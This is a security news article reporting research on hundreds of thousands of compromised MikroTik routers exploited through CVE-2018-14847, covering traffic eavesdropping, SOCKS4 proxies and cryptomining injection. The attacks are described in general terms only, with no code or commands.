Endpoint Security , Governance & Risk Management , Incident & Breach Response

MikroTik Routers Targeted in Data Eavesdropping Scheme

Researchers: Attackers Continue to Meddle With Hundreds of Thousands of MikroTik Routers
MikroTik Routers Targeted in Data Eavesdropping Scheme

Unknown attackers are intercepting every piece of data handled by more than 7,500 routers made by MikroTik, while also using another 239,000 compromised routers to serve as proxies, according to new research from 360's Network Security Research Lab.

See Also: Secureworks Named a Major Player in the 2024 IDC MDR Marketscape

The finding is the latest bad news centering on poorly secured internet of things devices, as attackers have continued to pound routers built by MikroTik. The manufacturer, based in Latvia, issued a patch in April for the vulnerability, designated CVE-2018-14847. But despite warnings from researchers and MikroTik, hundreds of thousands of routers remain unpatched and internet-connected. And attackers have come calling.

The vulnerability in the router can be used to gain access to Winbox, a simple GUI administration utility for MicroTik's RouterOS, as well as to Webfig, the web-based version of the utility. Successfully exploiting the vulnerability gives an attacker complete access to the router. A write-up showing how the vulnerability can be exploited was posted by Alireza Mosajjal of Iran's computer emergency readiness team, BASU CERT.

Packet Forwarding

Attackers often hunt for poorly protected routers because such devices can be used to launch massive distributed denial-of-service attacks or spy on anyone who uses them. For a subset of vulnerable MicroTik router operators, researchers warn that attackers do appear to be recording all web traffic.

MikroTik's advice for mitigating the vulnerability it patched in April

"We ... discovered that more than 7,500 victims are being actively eavesdropped [on], with their traffic being forwarded to IPs controlled by unknown attackers," researchers at 360's Network Security Research Lab write.

In these cases, the researchers note that attackers have been employing a feature built into RouterOS that enables anyone with administrator access to forward all packets to another destination.

Many more of the routers have been turned into proxies using the SOCKS4 internet client/server protocol, the researchers say. About 239,000 IPs attached to MikroTik routers are running a SOCKS4 proxy that has been maliciously activated. If the router is rebooted, "the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker's URL," the researchers write. "It is hard to say what the attacker is up to with this many SOCKS4 proxies but we think this is something significant."

Monero Mining

By the researchers' count, there are 370,000 MikroTik routers in the wild that have the CVE-2018-1484 flaw and are thus still vulnerable to being easily compromised.

"We strictly followed the Winbox communication protocol to make sure those devices are indeed MikroTik routers, and to verify if the device has been hacked and what the hacked box is [doing]," the researchers write.

Most of the affected routers are in Russia and Brazil, they say. Other countries with notable numbers of hacked routers include Indonesia, India, Iran, Italy, Poland, the United States, Thailand and Ukraine.

This isn't the first time that researchers have warned that MikroTik routers are being compromised by attackers (see Hacked MicroTik Routers Serve Cryptocurrency-Mining Malware).

In early August, multiple researchers warned that they'd found 209,000 MikroTik routers that had been remotely modified with code that mines for the virtual currency known as monero. The routers were seeded with either Coinhive or Crypto-Loot, both of which are small JavaScript mining programs.

If someone visits a web page that has either program embedded, their computer can be forced to begin mining for the virtual currency. The JavaScript programs generate random hashes, which are then used to complete a "block," referring to a batch of transactions on a blockchain.

Victims are usually unaware that their PC has been pressed into service via this type of cryptomining attack, although it does cause CPUs to work harder and consumes extra electricity.

The researchers, reviewing the attack campaign, note that attackers attempted to redirect all HTTP proxy requests on an infected site to an HTTP 403 error page that would inject Coinhive. "By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices," the researchers say.

But it's not clear how successful these attacks might have been. Notably, the external resources needed for mining "are blocked by the proxy ACL [access control lists] set by the attackers themselves," the researchers write.

About the Author

Jeremy Kirk

Jeremy Kirk

Executive Editor, Security and Technology, ISMG

Kirk was executive editor for security and technology for Information Security Media Group. Reporting from Sydney, Australia, he created "The Ransomware Files" podcast, which tells the harrowing stories of IT pros who have fought back against ransomware.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing bankinfosecurity.com, you agree to our use of cookies.